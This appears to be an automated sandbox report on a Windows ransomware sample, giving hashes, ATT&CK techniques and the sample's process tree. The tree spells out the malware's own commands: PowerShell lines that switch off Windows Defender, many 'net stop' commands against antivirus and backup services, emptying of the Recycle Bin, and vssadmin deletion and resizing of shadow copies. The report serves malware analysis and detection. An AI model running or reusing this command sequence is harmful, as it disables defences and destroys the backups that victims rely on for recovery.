1b8621d6e97ce87a8a5664699d285f417a5a08c40fb658aac9178dc5a6d4826c

Analysis

max time kernel
7s
max time network
151s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
Size

82KB
MD5

fe68d6631a5ed731e065858e78809da6
SHA1

2feb2430217ea991d6f034ed9e253e35b3bebc88
SHA256

1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514
SHA512

299863ee06b0803b6bc6385d964d464ca7393d8ff7445d9ce6ccf3aadf11ab1e6a0178931b2bfcefae5185d54205c712e867c4e2f88b22d3757c95100f7a2f62

Score

10^/10

discovery evasion ransomware trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies file permissions 1 TTPs 9 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

6016 icacls.exe
3432 icacls.exe
6000 icacls.exe
5296 icacls.exe
6008 icacls.exe
5716 icacls.exe
4224 icacls.exe
4744 icacls.exe
2584 icacls.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
6016	icacls.exe
3432	icacls.exe
6000	icacls.exe
5296	icacls.exe
6008	icacls.exe
5716	icacls.exe
4224	icacls.exe
4744	icacls.exe
2584	icacls.exe

Interacts with shadow copies 2 TTPs 14 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
5884	vssadmin.exe
3808	vssadmin.exe
5544	vssadmin.exe
5320	vssadmin.exe
3368	vssadmin.exe
5828	vssadmin.exe
5256	vssadmin.exe
5384	vssadmin.exe
5600	vssadmin.exe
5220	vssadmin.exe
5460	vssadmin.exe
5404	vssadmin.exe
6136	vssadmin.exe
5044	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
5956	taskkill.exe
2044	taskkill.exe
2292	taskkill.exe
5348	taskkill.exe
4272	taskkill.exe
4900	taskkill.exe
1736	taskkill.exe
5048	taskkill.exe
4364	taskkill.exe
4552	taskkill.exe
1972	taskkill.exe
1732	taskkill.exe
4720	taskkill.exe
5936	taskkill.exe
5772	taskkill.exe
5924	taskkill.exe
276	taskkill.exe
5860	taskkill.exe
2224	taskkill.exe
4920	taskkill.exe
5748	taskkill.exe
3988	taskkill.exe
4940	taskkill.exe
5728	taskkill.exe
4560	taskkill.exe
680	taskkill.exe
808	taskkill.exe
4416	taskkill.exe
4848	taskkill.exe
4204	taskkill.exe
2832	taskkill.exe
5436	taskkill.exe
4740	taskkill.exe
3552	taskkill.exe
4296	taskkill.exe
1740	taskkill.exe
4672	taskkill.exe
4572	taskkill.exe
5500	taskkill.exe
4500	taskkill.exe
5148	taskkill.exe
5796	taskkill.exe
5628	taskkill.exe
6008	taskkill.exe
4184	taskkill.exe
5492	taskkill.exe
1280	taskkill.exe
6116	taskkill.exe
5332	taskkill.exe
5556	taskkill.exe
5652	taskkill.exe
5764	taskkill.exe
5080	taskkill.exe
2808	taskkill.exe
1236	taskkill.exe
4244	taskkill.exe
4224	taskkill.exe
4544	taskkill.exe
4612	taskkill.exe
2264	taskkill.exe
5748	taskkill.exe
2288	taskkill.exe
4264	taskkill.exe
296	taskkill.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

4136 reg.exe
4820 reg.exe
1172 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5056 PING.EXE

pid	process
4136	reg.exe
4820	reg.exe
1172	reg.exe

pid	process
5056	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exepowershell.exe

pid	process
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1968	powershell.exe
1968	powershell.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1968	powershell.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exepowershell.exepowershell.exepowershell.exepowershell.exenetsh.exenet.exepowershell.exenet.exe

description	pid	process
Token: SeDebugPrivilege	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeIncreaseQuotaPrivilege	1968	powershell.exe
Token: SeSecurityPrivilege	1968	powershell.exe
Token: SeTakeOwnershipPrivilege	1968	powershell.exe
Token: SeLoadDriverPrivilege	1968	powershell.exe
Token: SeSystemProfilePrivilege	1968	powershell.exe
Token: SeSystemtimePrivilege	1968	powershell.exe
Token: SeProfSingleProcessPrivilege	1968	powershell.exe
Token: SeIncBasePriorityPrivilege	1968	powershell.exe
Token: SeCreatePagefilePrivilege	1968	powershell.exe
Token: SeBackupPrivilege	1968	powershell.exe
Token: SeRestorePrivilege	1968	powershell.exe
Token: SeShutdownPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeSystemEnvironmentPrivilege	1968	powershell.exe
Token: SeRemoteShutdownPrivilege	1968	powershell.exe
Token: SeUndockPrivilege	1968	powershell.exe
Token: SeManageVolumePrivilege	1968	powershell.exe
Token: 33	1968	powershell.exe
Token: 34	1968	powershell.exe
Token: 35	1968	powershell.exe
Token: 36	1968	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	3968	powershell.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeDebugPrivilege	2112	netsh.exe
Token: SeDebugPrivilege	3408
Token: SeDebugPrivilege	4120	net.exe
Token: SeDebugPrivilege	4228
Token: SeDebugPrivilege	4336	powershell.exe
Token: SeDebugPrivilege	4476	net.exe

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe

description	pid	process	target process
PID 1016 wrote to memory of 1968	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 1968	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 1312	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 1312	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 2404	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 2404	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 3968	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 3968	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 3408	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 3408	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 2112	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 2112	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4120	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4120	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4228	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4228	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4336	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4336	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4476	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4476	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4592	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4592	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4728	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4728	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	powershell.exe
PID 1016 wrote to memory of 4844	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	net1.exe
PID 1016 wrote to memory of 4844	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	net1.exe
PID 1016 wrote to memory of 4884	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	net.exe
PID 1016 wrote to memory of 4884	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	net.exe
PID 1016 wrote to memory of 4932	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	Conhost.exe
PID 1016 wrote to memory of 4932	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	Conhost.exe
PID 1016 wrote to memory of 4968	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	net.exe
PID 1016 wrote to memory of 4968	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	net.exe
PID 1016 wrote to memory of 5020	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	taskkill.exe
PID 1016 wrote to memory of 5020	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	taskkill.exe
PID 1016 wrote to memory of 5092	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	net.exe
PID 1016 wrote to memory of 5092	1016	1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe	net.exe

C:\Users\Admin\AppData\Local\Temp\1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\1e189b1013b6fc1b32514c7ff98962fc49563b9027798e71bc7755a525530514.bin.sample.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1312
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  PID:3408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  PID:2112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  PID:4120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  PID:4228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  PID:4476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  PID:4592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  PID:4728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:4844
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:5136
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:4932
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:5228
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:4968
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:5240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:5504
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:5020
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:5324
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:5092
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:5348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:4200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:5512
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:4976
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:5756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:5204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:5912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:5152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:5816
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:5640
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:5852
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:5944
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:5596
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:6064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:5140
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:6116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:4936
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:5332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:5348
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:5248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:4964
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:5540
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:5864
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5800
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5712
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:5588
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5524
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5436
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:5368
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:5292
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:4652
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:4472
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:2100
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:5616
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5460
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5404
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:6136
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5884
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5828
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5044
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3808
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5220
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:3368
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5544
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5256
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5384
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
